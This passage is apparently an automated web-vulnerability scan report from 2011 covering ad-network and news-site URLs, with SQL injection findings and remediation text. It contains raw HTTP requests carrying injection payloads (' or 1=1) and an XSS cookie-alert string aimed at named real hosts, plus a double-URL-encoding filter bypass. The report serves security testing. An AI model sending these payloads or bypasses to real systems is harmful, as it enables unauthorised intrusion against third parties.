27.4. http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html

27.5. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html

27.6. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/

27.7. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/

27.8. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html

27.9. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/

27.10. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/

27.11. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/

27.12. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/

27.13. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

27.14. http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html

27.15. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html

27.16. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/

27.17. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/

27.18. http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html

27.19. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

27.20. http://ad.doubleclick.net/

27.21. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

27.22. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

27.23. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

27.24. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

27.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

27.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

27.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

27.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

27.29. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

27.30. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

27.31. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

27.32. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

27.33. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

27.34. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

27.35. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

27.36. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

27.37. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

27.38. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

27.39. http://amch.questionmarket.com/adscgen/st.php

27.40. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

27.41. http://b3.mookie1.com/2/B3DM/DLX/1@x71

27.42. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

27.43. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

27.44. http://base.liveperson.net/visitor/addons/deploy.asp

27.45. https://base.liveperson.net/hcp/html/blankhtml.html

27.46. http://bh.heraldinteractive.com/includes/processAds.bg

27.47. http://boston30.autochooser.com/results.asp

27.48. http://br.imlive.com/NaN/

27.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.50. http://c.brightcove.com/services/messagebroker/amf

27.51. http://cafr.imlive.com/NaN/

27.52. http://common.onset.freedom.com/fi/adsense/

27.53. http://common.onset.freedom.com/fi/analytics/cms/

27.54. http://common.onset.freedom.com/oas/jx/

27.55. http://d3.zedo.com/jsc/d3/ff2.html

27.56. http://dm.de.mookie1.com/2/B3DM/2010DM/11076249577@x23

27.57. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23

27.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23

27.59. http://dm.de.mookie1.com/2/B3DM/2010DM/11326230958@x23

27.60. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23

27.61. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23

27.62. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23

27.63. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23

27.64. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23

27.65. http://dm.de.mookie1.com/2/B3DM/2010DM/11681620464@x23

27.66. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23

27.67. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23

27.68. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23

27.69. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23

27.70. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23

27.71. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23

27.72. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23

27.73. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23

27.74. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23

27.75. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23

27.76. http://dm.de.mookie1.com/2/B3DM/2010DM/12119796835@x23

27.77. http://dm.de.mookie1.com/2/B3DM/2010DM/12145795389@x23

27.78. http://dm.de.mookie1.com/2/B3DM/2010DM/122038498@x23

27.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23

27.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23

27.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23

27.82. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23

27.83. http://dm.de.mookie1.com/2/B3DM/2010DM/1682100952@x23

27.84. http://dm.de.mookie1.com/2/B3DM/2010DM/1838084819@x23

27.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1845536281@x23

27.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23

27.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23

27.88. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95

27.89. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

27.90. http://events.cbs6albany.com/site_indexes/allcurrenteventslist150m0.html

27.91. http://events.cbs6albany.com/site_indexes/allcurrentmovieslist150m0.html

27.92. http://events.cbs6albany.com/site_indexes/allvenueslist150m0.html

27.93. http://events.cbs6albany.com/site_indexes/restaurantlist150m0.html

27.94. http://events.cbs6albany.com/site_indexes/theaterlist150m0.html

27.95. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

27.96. http://ib.adnxs.com/ptj

27.97. http://ib.adnxs.com/ttj

27.98. http://imlive.com/categoryfs.asp

27.99. http://imlive.com/categoryms.asp

27.100. http://imlive.com/compliance.asp

27.101. http://imlive.com/disclaimer.asp

27.102. http://imlive.com/homepagems3.asp

27.103. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

27.104. http://imlive.com/liveexperts.asp

27.105. http://imlive.com/localcompanionship.asp

27.106. http://imlive.com/minglesingles.asp

27.107. http://imlive.com/pr.asp

27.108. http://imlive.com/sex_webcams_index/index.asp

27.109. http://imlive.com/sitemap.html

27.110. http://imlive.com/videosfr.asp

27.111. http://imlive.com/warningms.asp

27.112. http://jqueryui.com/about

27.113. http://jqueryui.com/themeroller/

27.114. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

27.115. http://mig.nexac.com/2/B3DM/DLX/1@x96

27.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

27.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

27.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

27.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

27.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

27.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

27.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

27.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

27.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

27.125. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

27.126. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

27.127. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

27.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

27.129. http://onset.freedom.com/fi/analytics/cms/

27.130. http://pixel.invitemedia.com/rubicon_sync

27.131. http://support.moxiesoft.com/

27.132. http://tags.expo9.exponential.com/favicon.ico

27.133. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

27.134. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

27.135. http://voken.eyereturn.com/favicon.ico

27.136. http://widgets.mobilelocalnews.com/

27.137. http://www.moxiesoft.com/tal_products/chat.aspx

27.138. http://www.paperg.com/jsfb/embed.php

27.139. http://www.parkersoft.co.uk/favicon.ico

27.140. http://www.screenthumbs.com/favicon.ico

27.141. http://www.screenthumbs.com/inc/nshots.php

27.142. http://www.screenthumbs.com/inc/qstats.php

27.143. http://www.screenthumbs.com/tools/js/linkthumbs.js

27.144. http://www.spicefactory.org/favicon.ico

28. Content type incorrectly stated

28.1. http://4c28d6.r.axf8.net/mr/a.gif

28.2. http://amch.questionmarket.com/adscgen/st.php

28.3. http://ar.voicefive.com/b/rc.pli

28.4. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

28.5. http://b.scorecardresearch.com/favicon.ico

28.6. http://b3.mookie1.com/favicon.ico

28.7. http://base.liveperson.net/hcp/html/mTag.js

28.8. http://base.liveperson.net/visitor/addons/deploy.asp

28.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.10. http://common.onset.freedom.com/fi/adsense/

28.11. http://common.onset.freedom.com/fi/analytics/cms/

28.12. http://event.adxpose.com/event.flow

28.13. http://events.cbs6albany.com/images/zbutton.gif

28.14. http://events.cbs6albany.com/json

28.15. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

28.16. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

28.17. http://mig.nexac.com/favicon.ico

28.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

28.19. http://oascentral.bostonherald.com/favicon.ico

28.20. http://onset.freedom.com/fi/analytics/cms/

28.21. http://raw.oggifinogi.com/Service.svc/OptOutCookiePresents

28.22. http://raw.oggifinogi.com/crossdomain.xml

28.23. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx

28.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx

28.25. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx

28.26. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx

28.27. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

28.28. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

28.29. http://twitter.com/oexchange.xrd

28.30. http://www.berkshireeagle.com/favicon.ico

28.31. http://www.bostonherald.com/home/includes/twitter.inc

28.32. http://www.bostonherald.com/projects/boston_pensions/

28.33. http://www.bostonherald.com/track/includes/twitter.inc

28.34. http://www.cbs6albany.com/images/logo.gif

28.35. http://www.moxiesoft.com/tal_products/chat.aspx

28.36. http://www.paperg.com/jsfb/embed.php

28.37. http://www.screenthumbs.com/tools/js/linkthumbs.js

28.38. http://www.spicefactory.org/parsley/schema/2.2/parsley-core.xsd

28.39. http://www.zvents.com/images/bd_bg.gif

28.40. http://www.zvents.com/images/bg_searchbar.gif

28.41. http://www.zvents.com/images/zbutton.gif

28.42. http://www.zvents.com/images/zlogo.gif

28.43. http://www.zvents.com/json

28.44. http://www.zvents.com/partner_json/search

29. Content type is not specified

29.1. http://ad.turn.com/favicon.ico

29.2. http://ads.bluelithium.com/st

29.3. http://base.liveperson.net/hc/5296924/cmd/url/

29.4. https://base.liveperson.net/hc/5296924/

29.5. http://www.mixpo.com/favicon.ico

30. SSL certificate

1. SQL injection
There are 122 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y'&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:17 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y''&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:18 GMT

gomez.b1(0,0);

1.2. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:16 GMT;
Content-Type: text/html
Location: http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Request 2

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:17 GMT;
Content-Type: text/html
Location: http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4938104.54

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

